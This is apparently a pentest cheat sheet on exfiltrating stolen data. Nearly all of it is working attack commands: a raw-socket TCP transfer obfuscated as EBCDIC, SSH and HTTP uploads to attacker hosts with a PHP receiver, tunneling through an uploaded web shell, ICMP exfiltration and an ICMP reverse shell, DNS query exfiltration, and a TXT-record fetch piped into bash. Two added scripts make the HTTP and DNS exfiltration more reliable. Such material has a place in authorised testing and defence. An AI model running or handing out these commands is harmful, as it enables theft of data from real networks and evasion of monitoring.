Pentest Tips

Exfiltration

TCP

# Start a listener on the attacker's machine (the port must match the one the victim sends to)
nc -lvp 8080 > /tmp/stolen.data

# On the victim: archive and base64 the data, convert it to EBCDIC so the stream does not
# read as text to a casual look at the bytes, and push it out over a raw socket
# (/dev/tcp is a bash feature, so this needs bash on the victim)
tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080

# On the attacker's machine: convert back to ASCII, decode and unpack
cd /tmp && dd conv=ascii if=stolen.data | base64 -d > stolen.tar.gz && tar xvzf stolen.tar.gz

SSH

# Stream the archive over SSH to the attacker's host and unpack it on the far side;
# nothing is written to the victim's disk
tar cf - stolen/ | ssh attacker@evil.com "cd /tmp/; tar xpf -"

HTTP/S

PHP code on the attacker's web server that writes whatever arrives in the "file" POST field to disk:

<?php
if (isset($_POST['file'])) {
    $file = fopen("/tmp/http.bs64", "w");
    fwrite($file, $_POST['file']);
    fclose($file);
}
?>

Data exfiltration:

# Send the archive to the attacker's server. curl --data sends the base64 verbatim and PHP
# decodes the body as a form, so every '+' in the base64 arrives as a space
curl --data "file=$(tar zcf - stolendata | base64)" http://c2.evil.com/contact.php

# On the attacker's server: turn the spaces back into '+', then decode and unpack
sed 's/ /+/g' /tmp/http.bs64 | base64 -d | tar xvzf -
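
The sed repair above exists because of how the body is parsed on the server. The following is an added example, not code from the original page: it reproduces the "broken base64" in shell by emulating the urldecode PHP applies before filling $_POST ('+' becomes a space, %HH becomes a byte), and shows the request body that survives it, with the value percent-encoded, which is what curl's --data-urlencode "file@-" does for a real request. The field name, helper names and sample data are constructed for the demo.

```bash
#!/bin/sh
# Added example, not from the original page: reproduce the "broken base64"
# and show what the request has to look like to avoid it. PHP parses the body
# as application/x-www-form-urlencoded, so form_decode below does what $_POST
# does: '+' becomes a space and %HH becomes a byte. raw_field is the body the
# page's curl --data "file=$(...)" sends; encoded_field percent-encodes the
# value first, which is what curl --data-urlencode does. Field name and sample
# data are constructed for the demo.

# raw_field NAME < value : "NAME=<value>" with the value sent verbatim
raw_field() {
    printf '%s=' "$1"; cat; echo
}

# encoded_field NAME < value : "NAME=<value>" with every byte as %HH
encoded_field() {
    printf '%s=' "$1"
    od -An -v -tx1 | tr -d ' \n' | sed 's/../%&/g'
    echo
}

# field_value NAME < body : the raw value of one field from a body line
field_value() {
    sed -n "s/^$1=//p"
}

# form_decode < value : the urldecode PHP applies before filling $_POST
form_decode() {
    LC_ALL=C awk 'BEGIN { h = "0123456789abcdef" }
        { s = $0; gsub(/\+/, " ", s); out = ""
          while ((p = index(s, "%")) > 0) {
              a = index(h, tolower(substr(s, p + 1, 1)))
              b = index(h, tolower(substr(s, p + 2, 1)))
              if (length(s) >= p + 2 && a && b) {   # valid %HH: emit the byte
                  out = out substr(s, 1, p - 1) sprintf("%c", (a - 1) * 16 + b - 1)
                  s = substr(s, p + 3)
              } else {                               # lone "%": keep it literally
                  out = out substr(s, 1, p); s = substr(s, p + 1)
              }
          }
          printf "%s%s", out, s }'
}

# Demo: printf 'hello>world?' | base64 | tr -d '\n' | raw_field file | field_value file | form_decode
# yields "aGVsbG8 d29ybGQ/" (the '+' is gone); the encoded_field path returns it intact.
```

The page's sed repair works only because base64 never contains a real space; encoding the value on the client side avoids relying on that.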

Tunneling

# Generate the server-side tunnel scripts, protected by a key
python3 neoreg.py generate -k thm

# Upload the generated script for the target's web stack (here tunnel.php) to the
# compromised web server, e.g. through its /uploader page

# Start the local SOCKS5 proxy (127.0.0.1:1080 by default) with the same key
python3 neoreg.py -k thm -u http://10.10.63.2/uploader/files/tunnel.php

# Reach a host on the internal network through the proxy
curl --socks5 127.0.0.1:1080 http://172.20.0.121:80/path/to/file.txt

ICMP

# Start the Metasploit ICMP listener on the attacker's machine
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp
set INTERFACE eth0
run

# From the victim: a "BOF" packet carrying the file name opens the transfer,
# every further packet carries a chunk of the data, and "EOF" closes it
sudo nping --icmp -c 1 10.10.63.2 --data-string "BOFfile.txt"
sudo nping --icmp -c 1 10.10.63.2 --data-string "some random data"
sudo nping --icmp -c 1 10.10.63.2 --data-string "EOF"

# icmpdoor gives an ICMP reverse shell. Start it on the victim, pointing at the attacker
sudo icmpdoor -i eth0 -d 192.168.0.133

# Connect from the attacker's box, pointing at the victim
sudo icmp-cnc -i eth1 -d 192.168.0.121

DNS

# On the attacker's DNS server, capture the incoming queries
sudo tcpdump -i eth0 udp port 53 -v

# Turn the file into one query name: base64, cut into 18-character labels, attacker zone
# as suffix. Only good for small files: a DNS name is limited to 253 characters
cat secrets.txt | base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed 's/$/dns.attacker.com/'

# Send the name as a query; the attacker's server sees it even though it never resolves
cat secrets.txt | base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed 's/$/dns.attacker.com/' | awk '{print "dig +short " $1}' | bash

# Fetch and run a script stored base64-encoded in a TXT record. A long record is returned
# as several quoted strings, so the spaces between them are stripped along with the quotes
dig +short -t TXT script.attacker.com | tr -d '" ' | base64 -d | bash
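
The pipeline above packs the whole file into a single name, which breaks past 253 characters, and base64's mixed case can be folded on the way since DNS names are case-insensitive. The following is an added example, not code from the original page, that generalizes the chunking: it hex-encodes the file, splits it into numbered names that respect the 63-character label and 253-character name limits, and reassembles them on the attacker's side even when the queries arrive out of order. The zone dns.attacker.com, the helper names and the sizes are assumptions; dns_send issues dig lookups like the page and needs a live resolver, everything else runs offline.

```bash
#!/bin/sh
# Added example, not from the original page: split a file into DNS query names
# that respect the protocol limits (63 characters per label, 253 per name) and
# reassemble them on the attacker's side. Hex is used instead of base64 because
# DNS names are case-insensitive and a resolver may fold base64's mixed case.
# The zone name and the sizes below are assumptions made for the demo.

LABEL_WIDTH=18       # hex characters per label (the limit is 63)
LABELS_PER_NAME=10   # 10 labels plus a sequence label and the zone stay well under 253

# dns_encode ZONE < file : print one query name per line, in transmission
# order, formatted <seq>.<label>.<label>...<ZONE>
dns_encode() {
    od -An -v -tx1 | tr -d ' \n' |                  # file -> one line of hex
    awk -v w="$LABEL_WIDTH" -v n="$LABELS_PER_NAME" -v z="$1" '
        { seq = 0
          for (i = 1; i <= length($0); i += w * n) {     # hex carried by one name
              chunk = substr($0, i, w * n); name = ""
              for (j = 1; j <= length(chunk); j += w)    # cut it into labels
                  name = name substr(chunk, j, w) "."
              printf "%d.%s%s\n", seq++, name, z
          } }'
}

# dns_names_valid < names : succeed only if every name and label is within limits
dns_names_valid() {
    awk -F. '{ if (length($0) > 253) exit 1
               for (i = 1; i <= NF; i++) if (length($i) > 63) exit 1 }'
}

# dns_send ZONE RESOLVER < file : one lookup per name, as the page does with dig;
# the attacker's authoritative server (or tcpdump on it) records the names
# even though none of them resolve
dns_send() {
    dns_encode "$1" | while IFS= read -r name; do
        dig +short "@$2" "$name" >/dev/null 2>&1 || true
    done
}

# dns_decode ZONE < names : reverse dns_encode; names may arrive in any order
dns_decode() {
    sort -t. -k1,1n |                                   # restore transmission order
    sed -e "s/\.$1\$//" -e 's/^[0-9]*\.//' |            # strip zone and sequence label
    tr -d '.\n' |                                       # back to one hex string
    LC_ALL=C awk 'BEGIN { h = "0123456789abcdef" }      # hex pairs -> raw bytes
        { for (i = 1; i < length($0); i += 2)
              printf "%c", (index(h, substr($0, i, 1)) - 1) * 16 + index(h, substr($0, i + 1, 1)) - 1 }'
}

# Victim:   dns_send dns.attacker.com 10.10.63.2 < secrets.txt
# Attacker: dns_decode dns.attacker.com < queried_names.txt > secrets.txt
```

Hex doubles the payload; base32 (valid in hostnames and case-insensitive) would be tighter, but hex keeps the decoder to one awk loop. The sequence label is what makes reassembly independent of resolver caching and retransmission order.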

DNS Tunneling TCP

# On the attacker's server (the one delegated as nameserver for tunnel.attacker.com): run
# iodined in the foreground; the server takes 10.1.1.1 and hands out the rest of 10.1.1.0/24
sudo iodined -f -c -P Attackerpass 10.1.1.1/24 tunnel.attacker.com

# On the victim, connect; the first client gets 10.1.1.2 on its tun interface
sudo iodine -P Attackerpass tunnel.attacker.com

# From the attacker, SSH to the victim over the tunnel and open a local SOCKS proxy;
# everything below rides inside DNS queries
ssh user@10.1.1.2 -4 -f -N -D 1080
# Retrieve a web page on the victim's network through that proxy
curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php

Living off trusted sites

Exfiltrating through sites the target already trusts (file-sharing, paste and cloud-storage services, social media, CDNs) hides the traffic among legitimate connections that are rarely blocked or inspected. The LOTS project (https://lots-project.com/) catalogues such sites and notes which have been abused for exfiltration, phishing, payload download and C2.


Last updated 2 years ago

References
  • Neo-reGeorg HTTPS tunneling tool
  • Iodine DNS Tunneling Tool
  • LOTS project: https://lots-project.com/